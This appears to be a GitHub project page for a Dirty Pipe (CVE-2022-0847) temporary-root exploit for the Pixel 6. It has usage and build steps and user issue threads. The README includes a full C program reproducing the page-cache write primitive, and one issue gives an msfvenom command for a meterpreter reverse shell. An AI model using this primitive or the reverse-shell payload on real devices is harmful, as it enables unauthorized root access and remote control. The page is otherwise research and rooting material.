
dirtypipe-android's Introduction

DirtyPipe for Android

Dirty Pipe (CVE-2022-0847) temporary root PoC for Android.

Targets

Currently runs only on the Pixel 6 with a security patch level from 2022-02-05 to 2022-04-05. Do not use it on other devices or other firmware versions: it will crash (reboot) the device.

Dirty Pipe was finally patched in the May 2022 security update for the Pixel 6.

There is a port to the Realme GT2 Pro by @rapperskull (#12). link

Certain Galaxy S22 firmware versions are also vulnerable, but no port exists yet (#3).
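Before pointing this tool at a device or build outside the list above, it is worth confirming that the kernel still has the underlying bug, because the full chain reboots the phone when anything is off. The C program below is an added example and is not part of this project's code. It reproduces the publicly documented CVE-2022-0847 primitive (fill and drain a pipe so every slot carries the merge flag, splice() one byte from a read-only file into it, then write() into the pipe; on a vulnerable kernel the written bytes land in the file's page cache) against a temporary file it creates itself, and reports whether that file changed. It assumes a Linux kernel and a writable /tmp (or $TMPDIR); the function name dirty_pipe_check and the sample content are the example's own. It can be cross-compiled with the same aarch64-linux-android31-clang used in the build section, pushed with adb and run unprivileged from /data/local/tmp; it touches no system file.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef __linux__
#error "Dirty Pipe is a Linux page-cache bug; this check only builds on Linux"
#endif

/* Fill the pipe to capacity and drain it again. Every pipe_buffer slot has
 * now been used by a normal write, so each carries PIPE_BUF_FLAG_CAN_MERGE.
 * A vulnerable kernel leaves that flag set when splice() later points a slot
 * at a page-cache page, so the next write() merges into the file's page. */
static int prepare_pipe(int p[2])
{
    static char scratch[4096];
    if (pipe(p) < 0)
        return -1;
    int size = fcntl(p[1], F_GETPIPE_SZ);
    if (size < 0)
        return -1;
    for (int r = size; r > 0;) {
        int n = r > (int)sizeof scratch ? (int)sizeof scratch : r;
        if (write(p[1], scratch, n) != n)
            return -1;
        r -= n;
    }
    for (int r = size; r > 0;) {
        int n = r > (int)sizeof scratch ? (int)sizeof scratch : r;
        if (read(p[0], scratch, n) != n)
            return -1;
        r -= n;
    }
    return 0;
}

/* Try to change a file through a descriptor opened O_RDONLY.
 * Returns 1 if the content changed (kernel vulnerable to CVE-2022-0847),
 * 0 if it did not (patched), -1 on an unrelated error.
 * Limits of the primitive: the target offset must not be page-aligned and
 * the write must stay inside one page and inside the file. */
int dirty_pipe_check(void)
{
    const char original[] = "ORIGINAL-PAGE-CACHE-CONTENT-0123456789"; /* constructed */
    const char patch[] = "DIRTY";
    const off_t target = 9;             /* byte 0 of a page cannot be hit */
    const char *tmp = getenv("TMPDIR"); /* assumption: /tmp or $TMPDIR writable */
    char path[256], buf[sizeof original];
    int result = -1, ro = -1, verify = -1, p[2] = {-1, -1};
    loff_t off = target - 1;

    snprintf(path, sizeof path, "%s/dirtypipe-check-XXXXXX", tmp ? tmp : "/tmp");
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, original, sizeof original) != (ssize_t)sizeof original)
        goto out;
    close(fd);
    fd = -1;

    ro = open(path, O_RDONLY); /* write(2) on this fd is refused by the kernel */
    if (ro < 0 || prepare_pipe(p) < 0)
        goto out;
    /* Splice one byte from the file into the pipe; off now equals target. */
    if (splice(ro, &off, p[1], NULL, 1, 0) != 1)
        goto out;
    /* Vulnerable kernel: these bytes land in the page cache at target. */
    if (write(p[1], patch, strlen(patch)) != (ssize_t)strlen(patch))
        goto out;

    /* Re-read through a fresh descriptor to see what the page cache holds. */
    verify = open(path, O_RDONLY);
    if (verify < 0 || pread(verify, buf, sizeof buf, 0) != (ssize_t)sizeof buf)
        goto out;
    result = memcmp(buf + target, patch, strlen(patch)) == 0;

out:
    if (fd >= 0) close(fd);
    if (ro >= 0) close(ro);
    if (verify >= 0) close(verify);
    if (p[0] >= 0) close(p[0]);
    if (p[1] >= 0) close(p[1]);
    unlink(path);
    return result;
}

int main(void)
{
    int r = dirty_pipe_check();
    if (r < 0)
        perror("dirty_pipe_check");
    else
        puts(r ? "VULNERABLE: file changed through a read-only descriptor"
               : "not vulnerable: file unchanged");
    return r < 0 ? 2 : 0;
}
```

A "not vulnerable" result means the page-cache merge is gone and this exploit cannot work on that kernel whatever the device or offsets. A "VULNERABLE" result only says the kernel bug is present; it says nothing about whether the library offsets the tool expects match the device, which is what decides between a root shell and a reboot.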

WARNING

There is a possibility of bricking your phone by using this tool. Use it at your own risk. In particular, do not update or install Magisk from the Magisk app: it will cause a permanent brick.

How to use

  1. Download the binary from the release page.
  2. Set up adb (Android platform tools).
  3. Launch run.bat (for Windows) or run.sh (for Linux/Mac).
    • If you get 'adb' is not recognized ... errors, add adb to PATH.
  4. Wait several seconds (~30 s) until the Magisk app is installed automatically.
  5. Run adb shell, then /dev/.magisk/su (or simply su) to get a root shell.

Screenshot

About Magisk

  1. Do not use the Install button in the Magisk app. It will brick your phone.
  2. Do not reboot even if the Magisk app asks for it. Rebooting loses the temporary root.
  3. Only root access is supported. Magisk/Zygisk modules are not supported.

How to build

  1. Install the Android NDK
  2. Set PATH for aarch64-linux-android31-clang
export PATH=$PATH:$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin
  3. Run make
$ make

How to build kernel module

  1. Download Pixel 6 kernel source. Link
  2. Put mymod directory on kernel/private/google-modules/
  3. Apply mymod/build-script-patch.patch to kernel/private/gs-google
  4. Run build script
# For the first build
$ LTO=thin ./build/build.sh
# For faster rebuild (skip full rebuild)
$ SKIP_MRPROPER=1 SKIP_DEFCONFIG=1 LTO=thin ./build/build.sh

Technical details

See here

Future work

  • Stop using insecure telnet
  • Make apk
  • Install Magisk
  • Add device support

Credits

dirtypipe-android's People

Contributors

polygraphene, rapperskull


dirtypipe-android's Issues

Errors in building kernel

I came across a similar issue as Issue #11 when building the kernel module, but the errors are "register_kprobe" and "unregister_kprobe" undefined. I have checked the header file and found "linux/kprobes.h" was included.

I didn't modify any code in mymod.c, so I have no idea why those errors occurred.

Some kernel compilation issues.

Hello:
I want to add some demo for reading and writing files in mymod.c, such as filp_open and kernel_read_file. I used the ./build/build.sh file in your document and found an error: "ERROR: modpost: "kernel_read_file" [../google-modules/mymod/mymod.ko] undefined!".

I don't have any driver development decompression, thank you!

Bootloader unlock on Verizon P6

I have a Verizon Pixel 6 and just successfully ran this. Is there any files I can modify as root to allow bootloader unlocking?

Reproduce exploit on pixel 6

Hello, I am planning to reproduce the exploit on Pixel 6. When running the exploit, it prompts unsupported version, as shown below:

(screenshot omitted)

I confirmed that in the libstagefright_soft_mp3dec.so at offset 0x1000, its value is 0x5f, as follows

(screenshot omitted)

Then I understand that I don't need to modify the offset of libc.so or the offset of vendor_file.

In theory, by simply erasing the version check in the exploit, I can successfully run the exploit on my pixel 6, right?

Sony Xperia 5 III (XQ-BQ62)

I just got this phone, and it has an unlockable bootloader, but when you unlock it, it wipes some keys from the TA partition (/dev/block/by-name/TA). So, I'd like to get root just so I can make an image of that partition before I unlock it at some later date. Does that lessen the amount of work needed for temp root?

I haven't applied the Android 12 update yet, in case I need to install a specific version.

Product=XQ-BQ62 Fingerprint=Sony/XQ-BQ62/XQ-BQ62:11/61.0.A.15.45/061000A015004501036498572:user/release-keys
Linux localhost 5.4.61-qgki-00383-g28c708f29a48 #1 SMP PREEMPT Tue Sep 28 20:31:15 JST 2021 aarch64

https://developer.sony.com/file/download/open-source-archive-for-61-0-a-15-45/

Results of the xxd and grep from the S22 ticket, cropped to those that match:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/libSForceVSE.so
00001000: 5f53 466f 7263 655f 4150 4450 3441 5044  _SForce_APDP4APD
vendor/lib/libacdbrtac.so
00001000: 5f5f 7562 7361 6e5f 6861 6e64 6c65 5f62  __ubsan_handle_b
vendor/lib/libadreno_utils.so
00001000: 5f6d 696e 5f6c 696e 655f 6f66 6673 6574  _min_line_offset
vendor/lib/libaudioalsa.so
00001000: 5f75 6273 616e 5f68 616e 646c 655f 6675  _ubsan_handle_fu
vendor/lib/libaudioconfigstore.so
00001000: 5f74 7265 6549 4e53 5f31 325f 5f76 616c  _treeINS_12__val
vendor/lib/libchilog.so
00001000: 5f70 6f73 6974 6976 655f 6d69 6e69 6d61  _positive_minima
vendor/lib/libcirrusspkrprot.so
00001000: 5f6d 696e 696d 616c 5f61 626f 7274 005f  _minimal_abort._
vendor/lib/libgpu_tonemapper.so
00001000: 5f00 5f5a 3230 656e 6769 6e65 5f64 656c  _._Z20engine_del
vendor/lib/libipebpsstriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libipebpsstriping170.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libjni_mfnrutil.so
00001000: 5f5f 7374 6163 6b5f 6368 6b5f 6661 696c  __stack_chk_fail
vendor/lib/libloc_socket.so
00001000: 5f31 3230 5f5f 7368 6172 6564 5f70 7472  _120__shared_ptr
vendor/lib/libmmcamera_lscv35.so
00001000: 5f75 7500 4373 7562 3634 5f73 7500 4373  _uu.Csub64_su.Cs
vendor/lib/libops.so
00001000: 5f61 626f 7274 005f 5f75 6273 616e 5f68  _abort.__ubsan_h

Questions about TECHNICAL-DETAILS


Hi, I have some doubts, why do we need to overwrite libstagefright_soft_mp3dec.so with the content of mymod.ko? Since we have tampered with /vendor/bin/modprobe, why not just execute finit_module(mymod.ko) and call the interface that closes SELINUX? What is the purpose of calling open(*.so) first?

About Closing SELinux

Hi, here is my reproduced exploit on Pixel 6:

(screenshot omitted)

I noticed that we need to manually execute setenforce 0 after using magisk to escalate to ROOT.

But in mymod.c, I see that the KO file already has the code to set SELINUX to Permissive mode.

(screenshot omitted)

Why do we need to manually set setenforce to 0 when selinux is already set to permissive in the KO file?

Pixel 6 Pro

I have a pixel 6 pro with an older security update. It's from 11-5-2021 and I was wondering if I can root the phone with this. The kernel version is "Linux localhost 5.10.43-android12-9-00001-g3b35c4eea2da-ab7739787 #1 SMP PREEMPT Thu Sep 16 20:17:47 UTC 2021 aarch64". I would have already tried however I don't know if its possible to brick the phone. Thanks

A20

So I was looking through the patch notes for the latest (April 2022) security patch by Samsung and I found out that this vulnerability was patched, which led me to think that this vulnerability could be exploited on my device (Samsung Galaxy A20 - SM-A205F) as it has not been patched yet. I would love to help add support for my device and get this exploit working on it.

Empty Space Size - Stage1 Payload is too Large

Hi, I am trying to run on a Z Fold 3 using "libtriplecam_video_optical_zoom.so" and your beta-4 release from the S22 thread.

I am getting an error:

Offset found: shellcode_offset: a5fe0 hook_offset: 5cbbc first instruction: a9be7bfd
Empty space size: 32 bytes
Stage1 payload (344 bytes) is too large. Exit.

I am not sure which empty space it is trying to check, and if there is anything I can do about it

insecure telnetd :trollface:

Have you tried replacing telnetd with meterpreter or a reverse shell?
msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o met

brick workaround

Any ideas on how to make Magisk install safely and not brick the phone?

Google Pixel 6 pro Verizon version

Bootloader unlock invisible,
and SIM not working also.
I'm from Pakistan. Here is another issue for phones from other countries: the "Pakistan Telecommunication Authority" tax.
Anyone please help to unlock the BL.
Then I can patch this phone with an approved IMEI for Pakistani phones...

su permission denied

Gave this a few shots on a Pixel 6 device running SQ1D.220205.003 (8069835).
Needed to set the -f flag, even though the build should technically be fine with the version check.

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 57.6 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 42.6 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 34.2 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 34.2 MB/s (14522684 bytes in 0.405s)
10 files pushed, 0 skipped. 33.5 MB/s (14588207 bytes in 0.415s)
Unsupported version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys

Full run logs

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 61.7 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 59.4 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 44.5 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 36.6 MB/s (14522684 bytes in 0.379s)
10 files pushed, 0 skipped. 35.9 MB/s (14588207 bytes in 0.387s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libstagefright_soft_mp3dec.so
Offset found: shellcode_offset: a2de0 hook_offset: 5a9dc first instruction: a9be7bfd
Empty space size: 544 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
It worked!
0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % adb shell
oriole:/ $ cd /data/local/tmp
oriole:/data/local/tmp $ ls
dirtypipe-android  dirtypipe-run-index  env-patcher  magisk  mylog2  root-log1  startup-root
oriole:/data/local/tmp $ cat root-log1
Successfully access log. Try=2
Start startup-root
Thu May 26 21:44:48 BST 2022: uid=0(root) gid=0(root) groups=0(root),3009(readproc) context=u:r:magisk:s0
oriole:/data/local/tmp $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
oriole:/data/local/tmp $ su
Permission denied
13|oriole:/data/local/tmp $

There are errors when making the code

└─$ make
aarch64-linux-android31-clang -Os -nostdlib -c -o stage2-c.o stage2-c.c
aarch64-linux-android31-clang -nostdlib -c -o stage2.o stage2.S
aarch64-linux-android31-clang -T stage2.lds -nostdlib -nostartfiles -static -o stage2 stage2-c.o stage2.o
echo -n "unsigned long stage2_libname_addr = 0x" > stage2-symbol.h
(nm stage2 | grep -e ' T libname'| cut -f 1 -d " " | tr -d $'\n'; echo "UL - 0x2000UL;") >> stage2-symbol.h || (rm stage2-symbol.h; false)
echo -n "unsigned long stage2_root_cmd_addr = 0x" >> stage2-symbol.h
(nm stage2 | grep -e ' T root_cmd'| cut -f 1 -d " " | tr -d $'\n'; echo "UL - 0x2000UL;") >> stage2-symbol.h || (rm stage2-symbol.h; false)
aarch64-linux-android31-clang -O2 -Os -c -o dirtypipe-android.o dirtypipe-android.c
aarch64-linux-android31-clang -O2 -Os -c -o elf-parser.o elf-parser.c
aarch64-linux-android31-clang -c -o stage1.o stage1.S
aarch64-linux-gnu-objcopy -O binary -j .text stage2 stage2.text
aarch64-linux-android31-clang -Os -nostartfiles -o modprobe-payload modprobe-payload.c -llog
modprobe-payload.c:49:24: warning: format specifies type 'int' but the argument has type 'long' [-Wformat]
LOGV("Parse: %d %d", root_cmd - cmdline, r - 1);
~~ ^~~~~~~~~~~~~~~~~~
%ld
modprobe-payload.c:24:79: note: expanded from macro 'LOGV'
#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "modprobe-payload", __VA_ARGS__); }
^~~~~~~~~~~
1 warning generated.
llvm-strip modprobe-payload
make: *** No rule to make target '../../p6/kernel/out/android-gs-pixel-5.10/dist/mymod.ko', needed by 'mymod.ko'. Stop.


How can I solve the problem? Thanks!

Port exploit to Realme GT2 Pro

Hi, I tried to run the exploit on a Realme GT2 Pro without success.
I modified the run file, adding -f /vendor/lib/libdrmfs.so (one of the libraries with 0x5F at offset 0x1000), but the phone reboots.
This is the script output:

dirtypipe-android: 1 file pushed, 0 skipped. 87.7 MB/s (46184 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 48.5 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 28.9 MB/s (6946 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 45.0 MB/s (14522684 bytes in 0.308s)
10 files pushed, 0 skipped. 44.2 MB/s (14589038 bytes in 0.315s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=RMX3301 Fingerprint=realme/RMX3301EEA/RED8ACL1:12/SKQ1.211019.001/S.GDPR.202204141322:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libdrmfs.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
startup script: /data/local/tmp/startup-root
It worked!

I think this is a problem with the included mymod.ko. Unfortunately Realme hasn't released yet the kernel sources. Do you think there's another way around?
Thank you.

S22

Could this same method work on the S22? I assume it would require mymod.ko to be built from the S22 kernel source, but can it work?

Unsupported product

Unsupported product: Product=NTH Fingerprint=HONOR/NTH-AN00/HNNTH:11/HONORNTH-AN00/4.2.0.108SP2C00:user/release-key

I know this exploit currently just adapts only on Google Pixel 6 and Realme GT2, I wonder is it possible to support Honor devices or if there's guidance to make it work?
